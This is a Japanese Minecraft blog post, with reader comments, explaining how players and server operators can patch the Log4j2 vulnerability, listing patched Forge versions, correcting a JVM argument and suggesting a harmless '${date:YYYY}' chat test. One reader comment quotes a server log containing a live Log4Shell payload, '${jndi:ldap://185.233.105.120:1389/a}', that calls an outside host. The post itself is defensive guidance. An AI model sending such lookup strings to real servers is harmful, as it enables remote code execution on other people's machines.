MENU
揚げたてのポテト
初めまして、揚げたてのポテトといいます!
普段はYouTubeでマイクラ企画という様々な企画を配信しています。
良ければ参加よろしくお願いします!!
当サイトではマインクラフトに関連した記事を分かりやすくをモットーに書いていきます。
アーカイブ
【おすすめ記事】月額485円からマイクラサーバーを立てるレンタルサーバーを紹介します!詳しく

【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】

揚げたてのポテト

こんにちわ、揚げたてのポテトです。

ポテ子ちゃん

どうもー!助手のポテ子ちゃんです!

揚げたてのポテト

先日、Log4j2の脆弱性に関する問題が話題になりましたね。

ポテ子ちゃん

え!?そうなの?初耳なんだけど…

揚げたてのポテト

マイクラにも大きく関わる問題なので、確認しながら見ていきましょう。今回はよく分からない人のために対応方法をまとめてみました。

当記事では、Log4j2の脆弱性に関する問題でマインクラフトでの対応方法をまとめた記事になります。

目次

Log4j2問題って何?

ポテ子ちゃん

ところでLog4j2問題ってどんなの?

マインクラフトでは、「Log4j2」というログを出力するプログラムが使われています。

今回、このLog4j2にて重大な脆弱性が発見されたため、大きく話題になりました。

脆弱性とは、プログラムの不具合や設計上のミスが原因となって発生したセキュリティ上の欠陥のこと

2021年12月10日にMinecraftの関連団体よりクライアント及びサーバーに関する重大な脆弱性が見つかったとの警告が発表されました。

マインクラフトでは、この脆弱性を悪用することで、任意のリモートコードを実行できてしまう例が報告されています。

要するに任意のコードを実行させると最悪パソコン操作もできてしまうという重大な問題です。

そのため、マインクラフトではこの問題に対応するべく、クライアント側やサーバー側で対処する必要があります。

このLog4j2問題はほぼ全てのバージョン、全プレイヤーが対象となるので必ず対処する必要があります。

公式クライアントの対処方法

公式クライアント(公式ランチャー)では、2021年12月10日以降よりLog4j2問題に対するパッチ(修正プログラム)が更新されました。

このパッチは、公式ランチャーを起動すれば自動的にパッチが適用されるのでクライアント側の対処方法はこれで完了です。

そのため、以前と同じく好きなバージョンで遊ぶことができるようになりました。

【追記】新ランチャーや旧ランチャーでも対応しているとのこと

Forgeクライアントの対応方法

次にMODで遊ぶ際に主にFrogeを導入してプレイすると思います。

その時に公式クライアントではなく、Forgeクライアントになるので上記の対策が適用されません。

そのため、Forgeをダウンロードするときにパッチが適用されたForgeをダウンロードする必要があります。

揚げたてのポテト

以下にバージョンごとにまとめたので参考にしてください。

  • 1.18.1以降:最初からパッチ適用
  • 1.18:バージョン38.0.17以降よりパッチ適用
  • 1.17.1:バージョン37.1.1以降よりパッチ適用
  • 1.16.5:バージョン36.2.20以降よりパッチ適用
  • 1.15.2:バージョン31.2.57以降よりパッチ適用
  • 1.14.4:バージョン28.2.25以降よりパッチ適用
  • 1.13.2:バージョン25.0.222以降よりパッチ適用
  • 1.12.2:バージョン2-14.23.5.2857以降よりパッチ適用
  • 1.11.2以下のバージョンは現時点ではパッチはありません。

サーバー側の対処方法

マイクラサーバーでは、バニラサーバーやプラグインサーバー、MODサーバーによってそれぞれ対処方法が異なりますので、注意してください。

バージョン1.18.1以降は既にパッチが適用されているので特に対処する必要はありません。

Minecraft Realmsも既にパッチが適用されています。

Minecraftの公式サイト(日本語版)は参考にしないで!!

上記のMinecraftの公式サイト(日本語版)でもサーバーの対策方法が載っていますが、1.7~1.11.2の対策方法が間違っているので、絶対に参考にしないように注意してください。

  • 誤「-Dlog4j.commercialFile=log4j2_17-111.xml」
  • 正「-Dlog4j.configurationFile=log4j2_17-111.xml」

公式サイト(英語版)は正しい対策方法が載っています。

24時間快適なマイクラサーバーを立てるなら「ConoHa VPS」での構築がおすすめ!

\今なら700円クーポンを使って無料で試せます!/

ConoHa VPSとは初期費用なし、最低利用期間なし、高性能VPS(超高速SSD、最新CPU搭載)なので、快適な24時間サーバーでいつでも友達とマルチプレイが楽しめます。

\【最大25%OFF】今なら「年末年始お年玉キャンペーン」を実施中!【期間限定】/

年末年始お年玉キャンペーンとは、期間中に6ヶ月以上のVPS割引きっぷが全プラン10%OFF!通常料金から最大25%OFF、月額530円~ご利用できます。(2022年1月31日(月)18時まで)

【月額485円~】格安マイクラサーバーを立てるなら「Agames.jp」がおすすめ!

【Java版】バニラ、MOD、Spigot、PaperMC、Mohist、BungeeCord対応

【統合版】バニラ、PMMP対応

マイクラサーバーは全て自動構築なので初心者でも簡単に立てられる!

脆弱性の確認方法

もし、当記事で心配の方がいらっしゃる場合は以下のコードをマイクラチャットで実行して確認することができます。

${date:YYYY}

上記のコマンドを「/(スラッシュ)」入れずにそのまま送信してください。

この時に「2022」(現在の西暦)と表示されなければ対策できています。

最後に

取り急ぎまとめた記事なので説明不足な部分もあるかと思いますが、改めて追記や修正を行いたいと思います。

Log4j2の脆弱性は大変危険な問題です。

サーバー運営してる人やマルチプレイで良く遊ぶ人は必ず対処を行いましょう!

揚げたてのポテト

最後まで読んでいただきありがとうございました。
次回の記事でお会いしましょう!

4.6 14 総投票数
\ この記事を評価 /

この記事が気に入ったら
フォローしてね!

よかったらシェアしてね!
URLをコピーする
URLをコピーしました!
4.6 14 総投票数
\ この記事を評価 /
guest
23 件のコメント
インラインフィードバック
すべてのコメントを表示
Towa

PaperMCver1.16未満は
パッチが適用されていないそうですが
PaperMCでLog4j2の
対策をする方法は無いのですか?

いつきさん

1.18.1-39.0.0でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx
[01:13:20] [Server thread/INFO]: Using new advancement loading for [email protected]xxxxx
[01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx)
[01:13:20] [Server thread/INFO]: FermatSleep joined the game
[01:13:21] [Server thread/INFO]: ${jndi:ldap://185.233.105.120:1389/a}
[01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected
[01:13:22] [Server thread/INFO]: FermatSleep left the game

みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかりませんか?( ; ; )

mumei

現在1.16.5のmod入りサーバーで遊んでいます。
ランチャーとforgeを最新のものに更新し、公式のJVM引数もコピペ済みなのですが、アップデートなど行われていないMODを入れるのは避けるべきでしょうか?

M

mohistはもうパッチきましたか?

あ

知識不足のため質問させてください。ユーザーの場合1.18.1に更新されていれば良いということでしょうか?
再起動(?)したことで1.18.1になったのかと思うのですが自信がないため質問させていただいました

目次
トップ
目次
閉じる